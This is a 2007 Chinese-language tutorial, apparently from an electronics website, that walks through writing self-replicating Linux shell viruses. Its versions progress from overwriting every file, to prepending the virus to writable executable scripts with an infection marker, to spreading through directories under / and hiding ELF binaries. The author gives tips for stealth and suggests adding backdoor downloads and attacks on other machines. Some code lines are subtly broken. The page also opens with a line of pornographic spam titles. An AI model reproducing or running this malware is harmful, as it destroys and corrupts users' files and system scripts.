色婷婷AⅤ一区二区三区|亚洲精品第一国产综合亚AV|久久精品官方网视频|日本28视频香蕉

          新聞中心

          EEPW首頁 > 嵌入式系統(tǒng) > 設(shè)計應(yīng)用 > 如何用Shell病毒技術(shù)感染Linux腳本程序

          如何用Shell病毒技術(shù)感染Linux腳本程序

          作者: 時間:2007-05-17 來源:網(wǎng)絡(luò) 收藏
          主要的shell病毒技術(shù)
          -------------------
            當(dāng)然,本文需要你至少了解linux shell編程的基礎(chǔ)知識和一星點的病毒知識.
            ok!我們進(jìn)入正題!
            我們來看一個最原始的shell病毒,代碼最能說明問題:
          ---------------------------------------------------------
          #shellvirus I
          for file in *
          do
           cp $0 $file
          done
          ---------------------------------------------------------
          簡單吧?遍歷當(dāng)前文件系統(tǒng)的所有文件,然后覆蓋所有文件.但是,我們知道linux是多用戶的操作系統(tǒng),它的文件是具有
          保護(hù)模式的,所以以上的腳本有可能會報出一大堆的錯誤,所以它很快就會被管理員發(fā)現(xiàn)并制止它的傳染.所以我們可以
          為該腳本做個判斷,這樣隱蔽性就大大增強了:
          ---------------------------------------------------------
          #shellvirus II
          for file in *
          do
            if test -f $file
            then
            if test -x $file
            then
             if test -w $file
             then
             if grep -s echo $file >.mmm
             then
             cp $0 $file
          fi; fi; fi; fi; fi
          done
          rm .mmm -f
          ---------------------------------------------------------
          ok.我們改進(jìn)了一下,加了若干的判斷,判斷文件是否存在,是否文件可執(zhí)行,是否我們有權(quán)限寫,再判斷它是否是腳本程序
          如果是就cp $0 $file,所以這段代碼是感然該系統(tǒng)所有的腳本程序的,危害性還是比較大的.if grep -s echo $file>/.mmm
          這句也可以這樣寫:if file $file | grep -s 'Bourne shell script' > /dev/nul ; then,也就是判斷file是否為shell
          腳本程序.
            但是,腳本病毒一旦在感染完畢之后就什么也不做了,它沒有象二進(jìn)制病毒那樣的潛伏的危害性,而且以上的腳本只是簡
          單的覆蓋宿主而已,所以我這里利用了一下傳統(tǒng)的二進(jìn)制病毒的感染機(jī)制,效果也不錯,看看下面代碼:
          ---------------------------------------------------------
          #infection
          head -n 24 $0 > .test    -取自身保存到.test
          for file in *      -遍歷文件系統(tǒng)
          do
           if test -f $file    -判斷是否為文件
           then
             if test -x $file    -判斷文件是否可執(zhí)行
             then
                if test -w $file  -判斷文件是否可寫
                then
                 if grep -s echo $file >.mmm  -判斷是否為腳本程序
                 then
                  head -n 1 $file >.mm    -提取要感染的腳本程序的第一行
                  if grep -s infection .mm >.mmm  -判斷該文件是否已經(jīng)被感染
                  then
                  rm -f .mm      -已經(jīng)被感染,則跳過
                  else        -還未被感染
                  cat $file > .SAVEE    -很熟悉吧?借用了傳統(tǒng)的二進(jìn)制文件的感染機(jī)制
                  cat .test > $file
                  cat .SAVEE >> $file
           fi; fi; fi; fi; fi
          done
          rm .test .SAVEE .mmm .mm -f
          --------------------------------------------------------
          程序的注解足以說明了,其實增加了潛伏的危害性,但還是特容易被發(fā)現(xiàn),沒辦法的事情,shell腳本一般都是明文的,呵呵.不過
          危害性已經(jīng)相當(dāng)大了.這段程序用了一個感染標(biāo)志:infection來判斷是否已經(jīng)被感染,著在程序中可以反應(yīng)出來.
          ok,為了使上面的代碼不容易被發(fā)現(xiàn),我必須優(yōu)化它,最先考慮的肯定是精練代碼:
          --------------------------------------------------------
          #infection
          for file in * ; do
           if test -f $file test -x $file test -w $file ; then
            if grep -s echo $file > /dev/nul ; then
            head -n 1 $file >.mm
             if grep -s infection .mm > /dev/nul ; then
             rm .mm -f ; else
              cat $file > .SAVEE
              head -n 13 $0 > $file
              cat .SAVEE >> $file
          fi; fi; fi
          done
          rm .SAVEE .mm -f
          --------------------------------------------------------
          現(xiàn)在只有兩個臨時文件的產(chǎn)生了,代碼也被精簡到了13行.當(dāng)然可以完全用;來把代碼甚至寫到1-2行,但這里我只是說明問題,就
          不寫出來了.
          好,我們看看,shell病毒還能做哪些有用的事情,有可能我們想感染別的目錄的文件,比如根目錄或者是/etc,/bin等等,因為大多
          數(shù)有用的系統(tǒng)配置腳本都存放在那些目錄下,只要對上述代碼稍作改動就可以實現(xiàn)了
          --------------------------------------------------------
          #infection
          xtemp=$pwd        -保存當(dāng)前路徑
          head -n 22 $0 > /.test
          for dir in /* ; do      -遍歷/目錄
          if test -d $dir ; then    -如果是目錄就cd該目錄
           cd $dir
           for file in * ; do      -遍歷該目錄文件
            if test -f $file test -x $file test -w $file ; then  -確定文件是否可執(zhí)行,可寫
            if grep -s echo $file > /dev/nul ; then      -確定是否為腳本程序
             head -n 1 $file > .mm
             if grep -s infection .mm > /dev/nul ; then    -確定是否已經(jīng)被感染
              rm .mm -f ; else
              cat $file > /.SAVEE        -和前面的感染機(jī)制一樣感染未被感染的腳本程序
              cat /.test > $file
              cat /.SAVEE >> $file
            fi; fi; fi
           done
           cd ..
          fi
          done
          cd $xtemp    -返回原目錄
          rm /.test /.SAVEE .mm -f
          -------------------------------------------------------------
          其實這段代碼只感染了/目錄下的一層目錄.當(dāng)然我們可以使它感染的更深,只是加幾個循環(huán)而已.同樣shell病毒可以做很多事情
          如download后門程序,為機(jī)器自動開后門,主動去攻擊聯(lián)網(wǎng)的其他機(jī)器,取用戶的email來發(fā)送傳染等等.總之它的實現(xiàn)技術(shù)不高深,
          但也比較實用,還是值得去說明一下的,呵呵.
          同樣,我們也可以感染elf文件,但危害性很小,這里不重點講,給個例程大家理解一下吧
          -------------------------------------------------------------
          for file in * ; do
           if test -f $file test -x $file test -w $file ; then
            if file $file | grep -s 'ELF' > /dev/nul ; then
            mv $file .$file
            head -n 9 $0 > $file
          fi; fi
          done
          .$0


          關(guān)鍵詞: Shell

          評論


          相關(guān)推薦

          技術(shù)專區(qū)

          關(guān)閉